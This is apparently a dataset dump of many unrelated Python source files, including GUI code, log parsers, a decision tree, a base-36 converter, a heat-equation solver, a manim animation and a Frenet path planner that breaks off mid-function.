def __init__(self):
super(Favorits, self).__init__()
self.setupUi(self)
self.buttonBox.button(QDialogButtonBox.Save).setText("Сохранить")
self.buttonBox.button(QDialogButtonBox.Cancel).setText("Отмена")
self.path = 'setting.json'
self.setStyleSheet(open('static/style.qss').read())
self.list_fav()
self.plus_pb.setIcon(QIcon(":/icons/icons/plus.png"))
self.minus_pb.setIcon(QIcon(":/icons/icons/minus.png"))
self.plus_pb.clicked.connect(self.addfav)
self.minus_pb.clicked.connect(self.delfav)
def list_fav(self):
try:
self.data = json.load(open(self.path))
for i in self.data['favorit']:
self.favlist_listWidget.addItem(i)
except FileNotFoundError:
print("File with setting not found")
except KeyError:
self.data['favorit'] = []
json.dump(self.data, open(self.path, 'w'))
self.list_fav()
def addfav(self):
name = def_url.Input_stream()
if name.exec_():
link = name.url_stream_le.text()
reg = "http[s]?://"
if re.match(reg, link) is not None:
self.data['favorit'].append(link)
json.dump(self.data, open(self.path, 'w'))
self.favlist_listWidget.clear()
self.list_fav()
def delfav(self):
buf = self.favlist_listWidget.currentItem().text()
self.data['favorit'].remove(buf)
json.dump(self.data, open(self.path, 'w'))
self.favlist_listWidget.clear()
self.list_fav()
if __name__ == '__main__':
app = QApplication([])
w = Favorits()
w.show()
app.exec_()
|
8,181 | b4a267873c5823ecfa62a5e90b67c37f9cca3cd2 | /Users/apple/anaconda/lib/python3.5/operator.py |
8,182 | e9e119dd69f9416e007e748d7f494741140efc8e | import sys
filepath = 'input.txt'
def intersection(list1, list2):
return set(list1).intersection(list2)
def computeSteps(x, y, step, steps):
# build dictionary with steps for each point
curr = 0
if (x,y) in steps:
curr = steps.get((x,y))
steps[(x,y)] = step + curr
def buildPoints(wire, steps):
points = []
x, y = 0, 0
s = 0
for p in wire:
direction = p[0]
step = int(p[1:])
if direction == 'D':
for i in range(0, step):
y -= 1
points.append((x,y))
s += 1
computeSteps(x, y, s, steps)
elif direction == 'U':
for i in range(0, step):
y += 1
points.append((x,y))
s += 1
computeSteps(x, y, s, steps)
elif direction == 'L':
for i in range(0, step):
x -= 1
points.append((x,y))
s += 1
computeSteps(x, y, s, steps)
elif direction == 'R':
for i in range(0, step):
x += 1
points.append((x,y))
s += 1
computeSteps(x, y, s, steps)
#end for
return points
with open(filepath) as fp:
steps = {}
port = (0,0)
wire1 = fp.readline().strip().split(',')
wire2 = fp.readline().strip().split(',')
point1 = buildPoints(wire1, steps)
point2 = buildPoints(wire2, steps)
commonPoints = intersection(point1, point2)
min = sys.maxsize
for k in commonPoints:
val = steps.get(k)
if val < min:
min = val
print(min)
|
8,183 | f870c776a62f3b743356c5515cd25e588dbfca15 | import time
from typing import List
from classiclikeiguana.timeout import timeout
class ExecutionMetrics:
def __init__(self, duration, succeeded: bool, timed_out: bool, lines: int, error: List[str] = None):
if error is None:
error = list()
self.duration = duration
self.succeeded: bool = succeeded
self.timed_out: bool = timed_out
self.lines: int = lines
self.error: List[str] = error
def __str__(self):
return "succeeded: {succeeded} ; lines: {lines} ; duration: {duration} s ; error: {error}" \
.format(succeeded=self.succeeded, lines=self.lines, duration=self.duration, error=self.error)
def read_stdout_until(process, terminal_startswith: str, failure_startswith: List[str], timeout_time: float,
debug: bool = False):
start = time.time()
line: str = ""
lines: int = 0
duration = None
succeeded = True
timed_out = False
errors: List[str] = list()
with timeout(timeout_time):
while True:
line = process.stdout.readline()
if debug: print(line, end="")
for start_str in failure_startswith:
if line.startswith(start_str):
errors.append(line)
succeeded = False
if any(line.startswith(start_str) for start_str in terminal_startswith):
duration = time.time() - start
break
else:
lines += 1
if duration is None:
succeeded = False
timed_out = True
duration = timeout_time
return ExecutionMetrics(duration, succeeded, timed_out, lines, errors)
|
8,184 | e2e275c48f28843931412f8e620f1be90289b40c | ### we prepend t_ to tablenames and f_ to fieldnames for disambiguity
import uuid
crud.settings.formstyle="table2cols"
########################################
db.define_table('t_form',
Field('id','id',
represent=lambda id:SPAN(id,' ',A('view',_href=URL('form_read',args=id)))),
Field('f_name', type='string',
label=T('Name')),
Field('f_content', type='text',
represent=lambda x: MARKMIN(x),
comment='WIKI (markmin)',
label=T('Content')),
Field('f_public', type='boolean', default=False,
label=T('Available to all users?')),
Field('f_uuid',default=str(uuid.uuid4()),
writable=False,readable=False),
Field('f_created_on','datetime',default=request.now,
label=T('Created On'),writable=False,readable=False),
Field('f_modified_on','datetime',default=request.now,
label=T('Modified On'),writable=False,readable=False,
update=request.now),
Field('f_created_by',db.auth_user,default=auth.user_id,
label=T('Created By'),writable=False,readable=False),
Field('f_modified_by',db.auth_user,default=auth.user_id,
label=T('Modified By'),writable=False,readable=False,
update=auth.user_id),
format='%(f_name)s',
migrate=settings.migrate)
db.t_form.f_name.default="Example: Job Application"
db.t_form.f_content.default="""
# Job Application
## Instuructions
- please complete the form
- export it in PDF
- print it
- sign it
- fax it to 111-111-1111
## Job Application Questionaire
### Personal data
--------
**first name:** | ``first_name``:input_text
**last name:** | ``last_name``:input_text
**email:** | ``email``:input_text
--------
### Skills
``skills``:input_area
### Signature
``accept``:input_bool Accept [[Confidentiality Agreement http://example.com]]
Signature: ..................................... Date: ``today``:input_date
"""
|
8,185 | a299bd230a25a646060f85cffc8e84c534e2f805 | # -*- coding: utf-8 -*-
# Copyright (c) 2017 Feng Shuo
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
from itertools import islice
from config import RequestInfo
import re
__all__ = ['NginxRequestInfo', ]
class NginxLogParse(object):
"""
Parse Nginx access.log into certain request info
"""
__slots__ = ('_ngx_log', 'ngx_log',)
def __init__(self):
self._ngx_log = '/var/log/nginx/access.log'
@property
def ngx_log(self):
"""
ngx_log filename
:returns: ngx_log filename
:rtype: ``string``
"""
return self._ngx_log
@ngx_log.setter
def ngx_log(self, nginx_log):
"""
set ngx_log
"""
self._ngx_log = nginx_log
def get_ngx_logs(self, line_nums=-1000):
"""
Get nginx logs by line_nums
:param line_nums:
line/row number in nginx log
:type line_nums:
``integer``
:returns:
if line_nums > 0, then get single request message line
if line_nums = 0, get all request messages lines
if line_nums < 0, get latest ${line_nums} request messages lines
:rtype:
``list``
"""
try:
with open(self.ngx_log) as F:
if line_nums > 0:
for line in islice(F, line_nums-1, line_nums):
return [line]
else:
lines = F.readlines()[line_nums:]
return lines
except Exception as e:
print "Failed to get detail log(s) in nginx access.log due to %s" % e
@staticmethod
def ngx_log_to_requestinfo(log=None):
"""
Parse nginx request log(one row/line) into namedtuple instance ``Request_info`` defined in class
:param log:
one nginx request log log in access.log you extracted
:type log:
string
"""
# pat is defined due to default nginx access.log format
pat = (r''
'(\d+.\d+.\d+.\d+)\s-\s-\s'
'\[(.+)\]\s'
'"GET\s(.+)\s\w+/.+"\s'
'(\d+)\s'
'(\d+)\s'
'"(.+)"\s'
'"(.+)"'
)
if log:
request_info = re.findall(pat, log)[0]
if request_info:
request_info = RequestInfo(request_info[0], request_info[1], request_info[2], request_info[3],
request_info[4], request_info[5], request_info[6])
return request_info
# TODO should move to test
# ngx_request_info = NginxLogParse()
# ngx_request_info.ngx_log = '../test.log'
# line = ngx_request_info.get_ngx_logs(100)
# req_info = ngx_request_info.ngx_log_to_requestinfo(line[0])
|
8,186 | ee68ebe146f948f3497577f40741e59b7421e652 | """
Deprecated entry point for a component that has been moved.
"""
# currently excluded from documentation - see docs/README.md
from ldclient.impl.integrations.files.file_data_source import _FileDataSource
from ldclient.interfaces import UpdateProcessor
class FileDataSource(UpdateProcessor):
@classmethod
def factory(cls, **kwargs):
"""Provides a way to use local files as a source of feature flag state.
.. deprecated:: 6.8.0
This module and this implementation class are deprecated and may be changed or removed in the future.
Please use :func:`ldclient.integrations.Files.new_data_source()`.
The keyword arguments are the same as the arguments to :func:`ldclient.integrations.Files.new_data_source()`.
"""
return lambda config, store, ready : _FileDataSource(store, ready,
paths=kwargs.get("paths"),
auto_update=kwargs.get("auto_update", False),
poll_interval=kwargs.get("poll_interval", 1),
force_polling=kwargs.get("force_polling", False))
|
8,187 | 191154c896fe441519ad4f343c6d92d6304fb3db | """
Created on Apr 27, 2017
@author: Franziska Schlösser
"""
from ipet.parsing.Solver import Solver
import re
from ipet import Key
from ipet import misc
class MIPCLSolver(Solver):
solverId = "MIPCL"
recognition_expr = re.compile("Reading data")
primalbound_expr = re.compile("Objective value: (\S*)")
dualbound_expr = re.compile("^(?:\s*lower-bound: |Objective value: )(\S+)")
solvingtime_expr = re.compile("Solution time: (\S*)")
version_expr = re.compile("MIPCL version (\S*)")
solverstatusmap = {"Objective value: (\S*) - optimality proven" : Key.SolverStatusCodes.Optimal,
"This problem is infeasible" : Key.SolverStatusCodes.Infeasible,
"Time limit reached" : Key.SolverStatusCodes.TimeLimit}
# variables needed for primal bound history
inTable = False
primalboundhistory_exp = re.compile("^ Time Nodes Leaves Sols Best Solution Lower Bound Gap%")
endtable = re.compile('^===========================================')
def __init__(self, **kw):
super(MIPCLSolver, self).__init__(**kw)
def extracHistory(self, line : str):
""" Extract the sequence of primal bounds
"""
if not self.isTableLine(line):
return
# history reader should be in a table. check if a display char indicates a new primal bound
if self.inTable:
allmatches = misc.numericExpressionOrInf.findall(line)
if len(allmatches) == 0:
return
pointInTime = allmatches[0]
pb = allmatches[4]
db = allmatches[5]
# in the case of ugscip, we reacted on a disp char, so no problem at all.
self.addHistoryData(Key.PrimalBoundHistory, pointInTime, pb)
self.addHistoryData(Key.DualBoundHistory, pointInTime, db)
def isTableLine(self, line):
if self.primalboundhistory_exp.match(line):
self.inTable = True
return False
elif self.inTable and self.endtable.match(line):
self.inTable = False
return False
return self.inTable
|
8,188 | ff66b33a133b627ba2329434d6c1649c94b6ec78 | import numpy as np
import copy
'''
本脚本主要用来实现决策树的相关内容。
constrcut_tree:该函数是构建决策树的主要函数
其输入:数据集X:n*p n:样本数,p-1维特征,p为样本类别,
以及属性信息label:属性名称,p-1一维数组,label表示的是此时X每一列对应的属性名称
决策结构用字典来表示,例如{attribution1:{0:{attribution2:{}},1:{attribution3:{}}}
'''
def construct_tree(X,label):
classList = [sample[-1] for sample in X]
#如果此时所有的样本的类别相同,返回该类别。
if classList.count(classList[0]) == len(classList):
return classList[0]
#如果此时对应属性已经划分完毕
if len(X[0])==1:
return return_major(classList)
#如果此时划分之后的子集为空,但是显然这是不可能的,对于这种情况来说,
#因为我们后面的编程过程中,我的属性划分的个数是根据,此时样本的属性数
#得到的,而不是一开始默认的,注意于西瓜书上算法的区别
#选择最优划分属性:
bestFea = bestdived(X)
bestFeaName = label[bestFea]
feaValue = [x[bestFea] for x in X]
uniqueValue = set(feaValue)
myTree = {bestFeaName:{}}
del(label[bestFea])
for i in uniqueValue:
myTree[bestFeaName][i]=construct_tree(splitDataSet(X,bestFea,i),label)
return myTree
#统计一组数据中,出现次数最多的时候用以下代码
def return_major(Y):
#给定一组类别,返回这组数据中,最大的类别
label_count={}
for i in Y:
label_count[i] = label_count.get(i,0)+1
sorted_class = sorted(label_count.items(),key=operator.itemgetter(1),reverse=True)
return sorted_class[0][0]
def splitDataSet(X,fea,value):
#根据属性的某个值得到相应的数据集
y = []
tem = copy.deepcopy(X)
for i in tem:
if i[fea] == value:
del(i[fea])
y.append(i)
return y
def bestdived(X):
#对任何一个特征进行划分,计算得到的数据集的熵。然后计算
#这个特征对应的信息增益
baseEnt = calcEnt(X)
tem0 = 0#记录最大的信息增益
for i in range(len(X[0])-1):
#fea 循环
feaValue = [x[i] for x in X]
uniqueValue = set(feaValue)
tem1 = 0#记录该特征划分的子集熵的总和
for j in uniqueValue:
subDataset = splitDataSet(X,i,j)
prob = len(subDataset)/len(X)
tem1 = tem1 + prob*calcEnt(subDataset)
infoGain = baseEnt - tem1
if infoGain > tem0:
tem0 = infoGain
bestFea = i
return bestFea
def calcEnt(X):
#计算数据即X的熵,此时的熵是当对于类别信息来的。
labelCount = {}
for i in X:
i = i[-1]
labelCount[i] = labelCount.get(i,0)+1;
tem = np.array(list(labelCount.values()))
tem = tem/len(X)
return np.sum(-np.log(tem)*tem)
|
8,189 | b5835b676eb8ac814086f7482f172f48e2ad5a0a | #anand python problem 2:29
#Write a function array to create an 2-dimensional array. The function should take both dimensions as arguments. Value of each element can be initialized to None:
#
def array_imp(row,col):
res=[[None]*col for i in range(row) ]
return res
if __name__=='__main__':
outs=array_imp(2,3)
print outs
|
8,190 | e98767fbac44f50f58c149e16124fef95b38cf71 | """
作用域
在Python中,当引用一个变量的时候,对这个【变量的搜索】是按照
本地作用域(Local)、
嵌套作用域(Enclosing function locals)、
全局作用域(Global)、
内置作用域(builtins模块)
的顺序来进行的,
即所谓的LEGB规则。
然而当在一个【函数内部为一个变量赋值】时,并不是按照上面所说LEGB规则来首先找到变量,之后为该变量赋值。在Python中,在函数中为一个变量赋值时,有下面这样一条规则
“当在函数中给一个变量名赋值是(而不是在一个表达式中对其进行引用),Python总是🔹创建或改变本地作用域的变量名🔹,除非它已经在那个函数中被声明为全局变量. ”
"""
x = 99
def func():
x = 88
func()
print(x)
y = 100
def func_y():
global y
y = 101
func_y()
print(y)
def func_z():
z = 520
def foo():
z = 521
foo()
print(z)
func_z()
def func_e():
count = 0
def foo():
nonlocal count
count = 12
foo()
print(count)
func_e()
"""
使用global关键字修饰的变量之前可以并不存在,而使用nonlocal关键字修饰的变量在嵌套作用域中必须已经存在
"""
|
8,191 | 5a265ecb9f1d6d0e4a5c66d241fbfe4a6df97825 | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 19 09:41:08 2018
hexatrigesimal to decimal calculator,
base 36 encoding; use of letters with digits.
@author: susan
"""
## create a dictionary as reference for BASE 36 calculations
WORD = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" # digits of BASE 36
BASE = {}
for i, item in enumerate(WORD): # iterate through word
BASE.update({WORD[i]:i}) # update BASE dictionary with key:value pair
# input function, BASE 36 numbers for calculations.
def enter_num():
""" get user input and do error checking for illegal digits.
returns
-------
num
"""
num = input("please enter a BASE 36 number, e.g. A36Z :> ")
num = num.upper()
for digit in num:
digit = digit.upper()
if digit not in WORD:
print(" **error** user input failed\n")
print("do you want to re enter number")
ans = input("y or n ")
ans = ans.upper()
if ans == "Y":
num = enter_num()
else:
num = None
return num
# make list function.
def mk_num_lst(num):
""" make BASE 36 number from user into a list.
reverse list so digit are read left to right.
returns
-------
num_lst
"""
num_lst = []
for digit in num:
num_lst.append(digit)
num_lst.reverse()
return num_lst
# convert function.
def convert(num_lst):
""" convert each digit to power of 36 appropriately.
prints result in decimal.
returns
-------
dec
"""
dec = 0
for i in range(0, len(num_lst)):
print("position right to left is >", i+1,
"value is ", BASE[(num_lst[i])],
"decimal value is",
(36**i) * BASE[(num_lst[i])])
dec += (36**i) * BASE[(num_lst[i])]
return dec
# main program flow function.
def main():
"""
process valid user input or
terminate program on failed input.
"""
num = enter_num()
if num is not None:
num_lst = mk_num_lst(num)
dec = convert(num_lst)
print("decimal value of BASE 36 number", num, "is", dec)
else:
print("user terminated program")
# program start.
main()
|
8,192 | 8e8629dd2d4bb601347694b18d7cb6a94880201d | my_order = ['spam', 'eggs', 'sausage', 'spam', 'bacon', 'spam']
while 'spam' in my_order:
print("I don't like spam!")
my_order.remove('spam')
print(my_order)
|
8,193 | c556aaf6aecb3c91d9574e0a158a9fa954108d70 | import numpy as np
import matplotlib.pyplot as plt
# some important constants
x_bound = y_bound = 1.
dx = dy = 0.05
k = 0.1
nx, ny = int(x_bound/dx), int(y_bound/dy)
dx2, dy2 = dx*dx, dy*dy
dt = (dx2 / k) / 4.0
t_end = 80 * dt
# set the grid
u0 = np.zeros((nx, ny))
u_exact = np.zeros((nx, ny))
u = np.zeros((nx, ny))
def get_exact(x, y, t, trunc):
"""Get the exact solution at a set t
"""
Z=0
for n in range(1, trunc):
for m in range(1, trunc):
Z_num = -120 * ( ((-n)**4 * np.pi**4 * (-1)**n) +\
(12 * n**2 * np.pi ** 2 * (-1)**n)\
+ 24 + (24 * (-1)**(1+n))\
*(-2 + (2*(-1)**m) ) )
Z_num_xy = np.sin(n*x*np.pi)*np.sin(m*y*np.pi)\
* np.exp(-(n**2 + m**2) * np.pi**2 * k * t)
Z_denom = n**7 * np.pi**10 * m**3
Z += Z_num * Z_num_xy / Z_denom
return Z
def get_L_norm(exact, u):
diffs = abs(exact - u)
l_diffs = []
for row in diffs:
l_diffs.append(max(row))
return max(l_diffs), diffs
# Initial conditions
for i in range(nx):
for j in range(ny):
x = i*dx
y = j*dy
u0[i,j] = x * (1-x**5) * y * (1-y)
u_exact[i,j] = get_exact(x, y, t_end, 10)
def do_timestep(u0, u):
# Propagate with forward-difference in time, central-difference in space
u[1:-1, 1:-1] = u0[1:-1, 1:-1] + k * dt * (
(u0[2:, 1:-1] - 2*u0[1:-1, 1:-1] + u0[:-2, 1:-1])/dx2
+ (u0[1:-1, 2:] - 2*u0[1:-1, 1:-1] + u0[1:-1, :-2])/dy2 )
u0 = u.copy()
return u0, u
u0, u = do_timestep(u0, u)
l_inf_norm, norm_diff_vals = get_L_norm(u_exact, u0)
fig = plt.figure(1)
ax = fig.add_subplot(111)
im = ax.imshow(u.copy(), cmap=plt.get_cmap('hot'), vmin=0, vmax=0.06)
cbar_ax = fig.add_axes([0.9, 0.15, 0.03, 0.7])
ax.set_title('2D distribution after 80 time steps using FTCS')
plt.xlabel('x node [-]')
plt.ylabel('y node [-]')
fig.colorbar(im, cax=cbar_ax)
plt.savefig('./writeup/problem2_plot.png')
fig = plt.figure(2)
ax = fig.add_subplot(111)
ax.set_title('|f_exact - f_ftcs| Using FTCS')
plt.xlabel('x node [-]')
plt.ylabel('y node [-]')
im = ax.imshow(norm_diff_vals.copy(), cmap=plt.get_cmap('hot'), vmin=0,\
vmax=l_inf_norm)
cbar_ax = fig.add_axes([0.9, 0.15, 0.03, 0.7])
fig.colorbar(im, cax=cbar_ax)
plt.savefig('./writeup/problem2_error.png')
print("The L_infinity error for FTCS is: " + str(l_inf_norm))
|
8,194 | 7a4d04bd60b5f5555982af372145f9f4bcd83ca2 | # Get Facebook's bAbi dataset
from utils import maybe_download
from shutil import rmtree
import os
import tarfile
def get_babi_en(get_10k=False):
data_dir = "datasets/tasks_1-20_v1-2/en/"
if get_10k == True:
data_dir = "datasets/tasks_1-20_v1-2/en-10k/"
maybe_download('https://s3.amazonaws.com/text-datasets/babi_tasks_1-20_v1-2.tar.gz', 'datasets', 11745123)
file = tarfile.open("datasets/babi_tasks_1-20_v1-2.tar.gz", "r:gz")
file.extractall("datasets")
file.close()
print("Some housekeeping...")
if not os.path.exists("datasets/babi"):
os.makedirs("datasets/babi")
for path, dir, files in os.walk(data_dir):
for file in files:
os.rename(os.path.join(data_dir, file), os.path.join("datasets/babi", file))
os.remove("datasets/babi_tasks_1-20_v1-2.tar.gz")
rmtree("datasets/tasks_1-20_v1-2")
print("Finished.") |
8,195 | f74e2e6b59330bd63fee9192e74a72178abc1cab | n = int(input())
a = [int(e) for e in input().split()]
ans = [0] * n
for i in range(n):
s = a[i]
ans[s-1] = i+1
print(*ans) |
8,196 | bdde3a3725510d4a83b09421e4b8538a38e29584 | from manimlib.imports import *
import math
class A_Swerve(Scene):
def construct(self):
chassis = Square(side_length=2, stroke_width=0, fill_color=GRAY, fill_opacity=1).shift(2*RIGHT)
fr = Dot().shift(UP+3*RIGHT)
fl = Dot().shift(UP+RIGHT)
rl = Dot().shift(DOWN+RIGHT)
rr = Dot().shift(DOWN+3*RIGHT)
x_tracker = ValueTracker(0)
y_tracker = ValueTracker(0.001)
rot_tracker = ValueTracker(0)
def updateFRArrow(arrow):
vector = calculateVectors(y_tracker.get_value(), x_tracker.get_value(), rot_tracker.get_value(), 0)[0]
arrow.put_start_and_end_on(UP+3*RIGHT, np.array(UP+3*RIGHT+vector[0]*np.cos(np.radians(vector[1]))*UP+(vector[0]*np.sin(np.radians(vector[1]))*RIGHT)))
def updateFLArrow(arrow):
vector = calculateVectors(y_tracker.get_value(), x_tracker.get_value(), rot_tracker.get_value(), 0)[1]
arrow.put_start_and_end_on(UP+RIGHT, np.array(UP+RIGHT+vector[0]*np.cos(np.radians(vector[1]))*UP+(vector[0]*np.sin(np.radians(vector[1]))*RIGHT)))
def updateRLArrow(arrow):
vector = calculateVectors(y_tracker.get_value(), x_tracker.get_value(), rot_tracker.get_value(), 0)[2]
arrow.put_start_and_end_on(DOWN+RIGHT, np.array(DOWN+RIGHT+vector[0]*np.cos(np.radians(vector[1]))*UP+(vector[0]*np.sin(np.radians(vector[1]))*RIGHT)))
def updateRRArrow(arrow):
vector = calculateVectors(y_tracker.get_value(), x_tracker.get_value(), rot_tracker.get_value(), 0)[3]
arrow.put_start_and_end_on(DOWN+3*RIGHT, np.array(DOWN+3*RIGHT+vector[0]*np.cos(np.radians(vector[1]))*UP+(vector[0]*np.sin(np.radians(vector[1]))*RIGHT)))
fr_vector = Arrow()
fr_vector.add_updater(updateFRArrow)
fl_vector = Arrow()
fl_vector.add_updater(updateFLArrow)
rl_vector = Arrow()
rl_vector.add_updater(updateRLArrow)
rr_vector = Arrow()
rr_vector.add_updater(updateRRArrow)
left_pad = Circle(radius=0.5).move_to(3*LEFT)
left_stick = Circle(radius=0.25, fill_color=WHITE, fill_opacity=1).move_to(3*LEFT)
left_stick.add_updater(lambda x: x.move_to(3*LEFT+0.4*x_tracker.get_value()*RIGHT+0.4*y_tracker.get_value()*UP))
right_pad = Circle(radius=0.5).move_to(1*LEFT)
right_stick = Circle(radius=0.25, fill_color=WHITE, fill_opacity=1).move_to(1*LEFT)
right_stick.add_updater(lambda x: x.move_to(1*LEFT+0.4*rot_tracker.get_value()*RIGHT))
self.play(FadeIn(chassis), ShowCreation(fr), ShowCreation(fl), ShowCreation(rl), ShowCreation(rr))
self.play(ShowCreation(left_pad), ShowCreation(left_stick), ShowCreation(right_pad), ShowCreation(right_stick))
self.play(ShowCreation(fr_vector), ShowCreation(fl_vector), ShowCreation(rl_vector), ShowCreation(rr_vector))
self.wait(1)
# Full forward
self.play(ApplyMethod(y_tracker.set_value, 1, run_time=1, rate_func=smooth))
# Semi circle
self.play(ApplyMethod(x_tracker.set_value, -1, run_time=2, rate_func=there_and_back),
ApplyMethod(y_tracker.set_value, -1, run_time=2, rate_func=smooth))
# Semi circle
self.play(ApplyMethod(x_tracker.set_value, 1, run_time=2, rate_func=there_and_back),
ApplyMethod(y_tracker.set_value, 1, run_time=2, rate_func=smooth))
# Neutral
self.play(ApplyMethod(y_tracker.set_value, 0.001, run_time=1, rate_func=smooth))
# Pure rotation
self.play(ApplyMethod(rot_tracker.set_value, -1, run_time=1, rate_func=smooth))
self.play(ApplyMethod(rot_tracker.set_value, 1, run_time=2, rate_func=smooth))
self.play(ApplyMethod(rot_tracker.set_value, 0, run_time=1, rate_func=smooth))
# Full forward plus rotation
self.play(ApplyMethod(y_tracker.set_value, 1, run_time=1, rate_func=smooth))
self.play(ApplyMethod(rot_tracker.set_value, -1, run_time=1, rate_func=smooth))
self.play(ApplyMethod(rot_tracker.set_value, 1, run_time=2, rate_func=smooth))
self.play(ApplyMethod(rot_tracker.set_value, 0, run_time=1, rate_func=smooth))
# Neutral
self.play(ApplyMethod(y_tracker.set_value, 0.001, run_time=1, rate_func=smooth))
# Move FR
self.wait(1)
self.play(ApplyMethod(rot_tracker.set_value, -1, run_time=1, rate_func=smooth))
fr_vector.remove_updater(updateFRArrow)
self.play(ApplyMethod(fr.shift, 0.3*DOWN), ApplyMethod(fr_vector.shift, 0.3*DOWN))
self.play(ApplyMethod(fr.set_color, RED), ApplyMethod(fr_vector.set_color, RED))
self.wait(1)
self.play(ApplyMethod(fr.set_color, WHITE), ApplyMethod(fr_vector.set_color, WHITE))
self.play(ApplyMethod(fr.shift, 0.3*UP), ApplyMethod(fr_vector.shift, 0.3*UP))
fr_vector.add_updater(updateFRArrow)
# Neutral
self.play(ApplyMethod(rot_tracker.set_value, 0, run_time=1, rate_func=smooth))
# Fade out
self.wait(1)
self.play(FadeOut(fr), FadeOut(fl), FadeOut(rl), FadeOut(rr), FadeOut(chassis),
FadeOut(left_pad), FadeOut(left_stick), FadeOut(right_pad), FadeOut(right_stick),
FadeOut(fr_vector), FadeOut(fl_vector), FadeOut(rl_vector), FadeOut(rr_vector))
wheelBase = 10
trackWidth = 10
def calculateVectors(FWD, STR, RCW, gyroAngle):
# Makes the command field-centric.
temp = FWD * math.cos(gyroAngle) + STR * math.sin(gyroAngle)
STR = -FWD * math.sin(gyroAngle) + STR * math.cos(gyroAngle)
FWD = temp
# Uses inverse kinematics to derive wheel speeds and angles.
R = math.hypot(wheelBase, trackWidth)
A = STR - RCW * (wheelBase / R)
B = STR + RCW * (wheelBase / R)
C = FWD - RCW * (trackWidth / R)
D = FWD + RCW * (trackWidth / R)
fr_ws = math.hypot(B, C)
fl_ws = math.hypot(B, D)
bl_ws = math.hypot(A, D)
br_ws = math.hypot(A, C)
fr_wa = math.atan2(B, C) * 180 / math.pi
fl_wa = math.atan2(B, D) * 180 / math.pi
bl_wa = math.atan2(A, D) * 180 / math.pi
br_wa = math.atan2(A, C) * 180 / math.pi
# Normalize wheel speeds.
max = fr_ws
if fl_ws > max:
max = fl_ws
if bl_ws > max:
max = bl_ws
if br_ws > max:
max = br_ws
if max > 1:
fr_ws /= max
fl_ws /= max
bl_ws /= max
br_ws /= max
return np.array([[fr_ws, fr_wa],
[fl_ws, fl_wa],
[bl_ws, bl_wa],
[br_ws, br_wa]])
|
8,197 | 4647a7d0996ceeef4f39cf3182ac3944d25cb349 | #!/usr/bin/python2
# -*- coding: UTF-8 -*-
# coding: utf-8
#!/usr/bin/env python
'''
发布轨迹信息
path.x; path.y; c_speed;
'''
import numpy as np
import matplotlib.pyplot as plt
import copy
import math
from cubic_spline import Spline2D
from polynomials import QuarticPolynomial, QuinticPolynomial
import time
import rospy
from std_msgs.msg import String
from std_msgs.msg import Float32
from std_msgs.msg import Int32
from geometry_msgs.msg import Point
from nav_msgs.msg import Path
from local_planner.msg import localPath
from geometry_msgs.msg import PoseStamped, Quaternion
import tf
from CAN_driver.msg import Motor_Feedback
from GNSS_driver.msg import GNSS_CAN
import sys
# 参数
MAX_SPEED = 30.0 # 最大速度 [m/s]
MAX_ACCEL = 50.0 # 最大加速度 [m/ss]
MAX_CURVATURE = 30.0 # 最大曲率 [1/m]
MAX_ROAD_WIDTH = 10.0 # 最大道路宽度 [m]
D_ROAD_W = 2.0 # 路宽采样间隔 [m]
DT = 0.3 # Delta T[s]
MAXT = 6.0 # 最大预测时间 [m]
MINT = 4.0 # 最小预测时间 [m]
TARGET_SPEED = 15.0/3.6 # 目标速度 [m/s] 即纵向速度保持
D_T_S = 10.0/3.6 # 目标opo][]o][o][\o][o][o速度采样间隔 [m/s]
N_S_SAMPLE = 0.1 # 目标速度采样数量
ROBOT_RADIUS = 2.3 # 车辆半径 [m]
THRESH_DIST=0.01
# 损失函数权重
KJ = 0.8
KT = 0.1
KD = 20.0
KLAT = 0.8
KLON = 0.2
show_animation = True
Gob_x = []
Gob_y = []
#规划失败标志 1 决策层需要
PathFail_flag = 0
class FrenetPath:
def __init__(self):
self.t = []
self.d = []
self.d_d = []
self.d_dd = []
self.d_ddd = []
self.s = []
self.s_d = []
self.s_dd = []
self.s_ddd = []
self.cd = 0.0
self.cv = 0.0
self.cf = 0.0
self.x = []
self.y = []
self.yaw = []
self.ds = []
self.c = []
def calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):
frenet_paths = []
# generate path to each offset goal
for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):
# 采样,并对每一个目标配置生成轨迹
# Lateral motion planning
for Ti in np.arange(MINT, MAXT, DT):
fp = FrenetPath()
# 计算出关于目标配置di,Ti的横向多项式
lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)
fp.t = [t for t in np.arange(0.0, Ti, DT)]
fp.d = [lat_qp.calc_point(t) for t in fp.t]
fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]
fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]
fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]
# 纵向速度规划 (速度保持)
# Loongitudinal motion planning (Velocity keeping)
for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):
tfp = copy.deepcopy(fp)
lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)
tfp.s = [lon_qp.calc_point(t) for t in fp.t]
tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]
tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]
tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]
###########################################################
#高速时的损失函数
###########################################################
Jp = sum(np.power(tfp.d_ddd, 2)) # square of jerk
Js = sum(np.power(tfp.s_ddd, 2)) # square of jerk
# square of diff from target speed
ds = (TARGET_SPEED - tfp.s_d[-1])**2
# 横向的损失函数
tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1]**2
# 纵向的损失函数
tfp.cv = KJ * Js + KT * Ti + KD * ds
# 总的损失函数为d 和 s方向的损失函数乘对应的系数相加
#########################################################
#低速时的损失函数
#########################################################
# # 低速时的损失函数
# ltfp = copy.deepcopy(tfp)
# ltfp.d_sss = [lat_qp.calc_third_derivative(s) for s in tfp.s]
# Jp_s = sum(np.power(ltfp.d_sss, 2)) # square of jerk
# Js = sum(np.power(tfp.s_ddd, 2)) # square of jerk
# # S = s1 - s0
# dS = tfp.s[-1] - s0
# #横向的损失函数
